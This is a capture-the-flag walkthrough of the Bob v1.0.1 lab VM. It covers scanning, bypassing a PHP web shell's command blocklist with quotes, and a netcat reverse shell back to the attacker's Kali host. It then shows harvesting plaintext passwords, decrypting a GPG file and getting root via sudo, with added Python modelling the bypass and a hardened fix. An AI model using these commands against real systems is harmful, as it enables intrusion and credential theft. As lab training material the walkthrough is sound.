Information Gathering

Note: when I first got this VM, opening it in VMware gave it no IP address. A colleague pointed out that simply updating VMware to the latest version fixes it. Rather mysterious.

  • First, check the Kali IP address:
root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1717sec preferred_lft 1717sec
inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • An Nmap ping sweep turns up the target IP: 10.10.8.18
root at kali in ~/Bob_v1.0.1 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:37 CST
Nmap scan report for 10.10.8.1
Host is up (0.000078s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.18
Host is up (0.00022s latency).
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000047s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.40 seconds

Port Scan

  • Scan for open ports:
root at kali in ~/Bob_v1.0.1 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:38 CST
Nmap scan report for 10.10.8.18
Host is up (0.000034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-title: Site doesn't have a title (text/html).
25468/tcp open unknown
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds

Service Identification

  • Identify the services behind those ports:
root at kali in ~/Bob_v1.0.1 
$ nmap -p21,80,25468 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:39 CST
Nmap scan report for 10.10.8.18
Host is up (0.00050s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 10.10.8.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.13 seconds

Vulnerability Scan

  • Run Nmap's vuln scripts against the host:
root at kali in ~/Bob_v1.0.1 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.18 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 11:40 CST
Nmap scan report for 10.10.8.18
Host is up (0.000058s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /login.html: Possible admin folder
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 43.86 seconds
  • Looked through the reported findings; none of them is useful.

Directory Scan

root at kali in ~/Bob_v1.0.1 
$ dirsearch -u http://10.10.8.18 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Bob_v1.0.1/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-14_11-41-58.log

Target: http://10.10.8.18/

[11:41:58] Starting:
[11:41:59] 403 - 295B - /.htpasswds
[11:41:59] 403 - 299B - /.htaccess.bak1
[11:41:59] 403 - 301B - /.htaccess.sample
......

root at kali in ~/Bob_v1.0.1
$ cat dirsearch.txt | grep 200
200 3KB http://10.10.8.18:80/about.html
200 3KB http://10.10.8.18:80/contact.html
200 1KB http://10.10.8.18:80/index.html
200 2KB http://10.10.8.18:80/login.html
200 4KB http://10.10.8.18:80/news.html
200 673B http://10.10.8.18:80/passwords.html
200 111B http://10.10.8.18:80/robots.txt

Exploitation

Information Disclosure

  • Visiting each of the discovered pages in turn, it is clearly a hand-built site.

  • Going through the directory-scan results page by page, summarized:

Page            Notes
about.html      Description of the site; nothing useful.
contact.html    Contact information; Bob J's entry includes "admin", so he may be the administrator.
index.html      Home page; nothing useful, skipped.
login.html      A login form, but it has been disabled.
news.html       Site news; nothing useful.
passwords.html  Some filler text about the file itself; nothing useful.
robots.txt      The crawler-exclusion file; it lists the following four entries:
                  login.php: Not Found
                  dev_shell.php: a web shell
                  lat_memo.html: a memo hinting that a web shell exists on the server
                  passwords.html: nothing useful

Web Shell Filter Bypass

  • Open dev_shell.php; the page presents a single Command input form.

  • Submitting directly shows little on the page, so enter whoami in the Command field and capture the request with Burp Suite.

  • The command is executed. Next, try ls and other sensitive commands.

  • The response now reads: Get out skid lol, so the server is filtering input.
  • For command-execution filters, the common bypasses are single/double quotes, separators (${IFS}), special variables ($9), and so on.
  • Try l's' instead; it goes through and lists the web root.

  • The listing shows that dev_shell.php has a backup file named dev_shell.php.bak; download and analyze it:
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
......
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command"/> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !== false) {
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
} else {
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)) {
system("echo Get out skid lol");
} else {
system($_POST['in_command']);
}
}
?>
</div>
......
  • A quick read shows the filter only compares the first space-separated token against a short list of common command names, so single quotes bypass all of it.
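
  • To make this concrete, the following is an added Python model of the filter logic (written for this write-up; it is not the box's PHP and not the original author's code). It re-implements the first-token blocklist, shows what /bin/sh actually sees once quotes are removed, and puts a hardened allowlist-and-no-shell version beside it. The program paths in ALLOWED are assumed:

```python
import shlex
import subprocess

# Blocklist copied from dev_shell.php.bak; the check below mirrors its logic.
BAD_WORDS = ["pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"]


def devshell_filter_allows(command: str) -> bool:
    """Re-implementation of the PHP check: reject any ';', then compare the
    first raw space-separated token against BAD_WORDS. It inspects the string
    before the shell parses it, which is the root of the flaw."""
    if ";" in command:
        return False
    first = command.strip().split(" ")[0]
    return first not in BAD_WORDS


def shell_argv0(command: str) -> str:
    """The program name the shell would really execute. shlex follows POSIX
    word splitting, so quotes are removed during parsing: l's' becomes ls."""
    words = shlex.split(command)
    return words[0] if words else ""


def filter_is_bypassed(command: str) -> bool:
    """True when the filter lets the string through but the shell would
    still run a blocked program."""
    return devshell_filter_allows(command) and shell_argv0(command) in BAD_WORDS


# Hardened form: allowlist of program names mapped to absolute paths
# (assumed paths), arguments kept as a list, and no shell involved at all.
ALLOWED = {"uptime": "/usr/bin/uptime", "date": "/bin/date"}


def hardened_resolve(command: str):
    """Return the argv to execute, or None when the request is rejected."""
    try:
        words = shlex.split(command)
    except ValueError:  # unbalanced quotes: reject rather than guess
        return None
    if not words or words[0] not in ALLOWED:
        return None
    return [ALLOWED[words[0]]] + words[1:]


def run_hardened(command: str) -> str:
    """Execute an allowed command without a shell; metacharacters in the
    arguments are passed literally and never interpreted."""
    argv = hardened_resolve(command)
    if argv is None:
        return "rejected"
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    for sample in ["ls", "l's'", "n'c' -e /bin/bash 10.10.8.17 4444", "whoami"]:
        print(f"{sample!r}: filter allows={devshell_filter_allows(sample)} "
              f"shell runs={shell_argv0(sample)!r} bypassed={filter_is_bypassed(sample)}")
```

Running filter_is_bypassed over submitted strings shows which inputs the PHP would have let through while the shell executed a blocked program anyway. The hardened variant rejects anything whose resolved program name is not on the allowlist, and because subprocess.run receives a list rather than shell=True, there is no second parsing stage for the filter to lose against.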

Reverse Shell

  • Since nc is on the blocklist, the nc binary probably exists on the box; try a reverse shell:
n'c' -e /bin/bash 10.10.8.17 4444

  • Kali receives the shell:
root at kali in ~/Bob_v1.0.1 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.18: inverse host lookup failed: Unknown host
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.18] 45514
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
  • The shell is non-interactive, so upgrade it with Python:
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Milburg-High:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
www-data@Milburg-High:/var/www/html$

Host Enumeration

  • List the users on the system that have a login shell:
www-data@Milburg-High:/var/www/html$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
  • Quite a few users. Check for SUID binaries:
www-data@Milburg-High:/var/www/html$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/bin/su
/bin/ping
/bin/umount
/bin/mount
/bin/ntfs-3g
/bin/fusermount
  • Nothing useful in the way of information or files so far.
  • Fall back to the brute-force approach and dump each user's home directory listing:
www-data@Milburg-High:/var/www/html$ ls -alR /home/bob > /tmp/bob_home.txt 2>/dev/null
www-data@Milburg-High:/var/www/html$ ls -alR /home/jc > /tmp/jc_home.txt 2>/dev/null
www-data@Milburg-High:/var/www/html$ ls -alR /home/seb > /tmp/seb_home.txt 2>/dev/null
www-data@Milburg-High:/var/www/html$ ls -alR /home/elliot > /tmp/elliot_home.txt 2>/dev/null
  • In bob's home directory there is a .old_passwordfile.html file with the following contents:
www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
  • It holds the passwords for jc and seb, which can be tried for login.

GPG Decryption

  • The port scan showed that port 25468 is SSH; try connecting:
root at kali in ~ 
$ ssh jc@10.10.8.18 -p 25468
The authenticity of host '[10.10.8.18]:25468 ([10.10.8.18]:25468)' can't be established.
ED25519 key fingerprint is SHA256:OY3LVMIRHTASgrwg8mXjqq8nFPrcwLV7lhRz0gpjwq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.8.18]:25468' (ED25519) to the list of known hosts.
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/


jc@10.10.8.18's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jc@Milburg-High:~$ id
uid=1002(jc) gid=1002(jc) groups=1002(jc),100(users)
  • Login succeeds. Digging through the files again, bob's directory holds a GPG-encrypted file:
/home/bob/Documents:
total 20
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 .
drwxr-xr-x 18 bob bob 4096 Mar 8 2018 ..
-rw-r--r-- 1 bob bob 91 Mar 5 2018 login.txt.gpg
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 Secret
-rw-r--r-- 1 bob bob 300 Mar 4 2018 staff.txt
  • Since login.txt.gpg is encrypted, a key is needed; dig down into the Secret directory:
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here:
total 12
drwxr-xr-x 2 bob bob 4096 Mar 5 2018 .
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 ..
-rwxr-xr-x 1 bob bob 438 Mar 5 2018 notes.sh
  • Contents of notes.sh:
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
  • Honestly I didn't get it at first; after searching Baidu, it turns out this damn thing is an acrostic.
  • Passphrase: HARPOCRATES
  • With the passphrase in hand, decrypt login.txt.gpg:
jc@Milburg-High:/home/bob/Documents$ gpg -d login.txt.gpg 
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
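
  • As an added check on the acrostic reading above (example code written for this write-up, not part of the original post or the box), the following extracts the first letter of every echoed line in notes.sh, with the script text embedded as a constructed copy so it runs offline:

```python
import re

# Constructed copy of the notes.sh shown above, embedded so the check is self-contained.
NOTES_SH = '''#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
'''


def echoed_lines(script: str) -> list:
    """Pull the quoted string out of every `echo "..."` line, in file order."""
    return re.findall(r'^echo "([^"]*)"', script, flags=re.MULTILINE)


def acrostic(script: str) -> str:
    """First letter of each echoed line; the "-= Notes =-" banner starts with
    punctuation rather than a letter and is skipped, so only the poem counts."""
    letters = []
    for text in echoed_lines(script):
        if not text or not text[0].isalpha():
            continue
        letters.append(text[0].upper())
    return "".join(letters)


if __name__ == "__main__":
    print(acrostic(NOTES_SH))  # HARPOCRATES
```

Reading the initial letters top to bottom gives HARPOCRATES, which is exactly the passphrase gpg accepts for login.txt.gpg.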

  • That yields bob's login password; switch to that user:
jc@Milburg-High:/home/bob/Documents$ su bob
Password:
bob@Milburg-High:~/Documents$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)

Privilege Escalation via sudo

  • bob is in the sudo group; check what he is allowed to run:
bob@Milburg-High:~/Documents$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
  • bob can run any command, so just read the flag:
bob@Milburg-High:~/Documents$ sudo cat /flag.txt
CONGRATS ON GAINING ROOT

.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t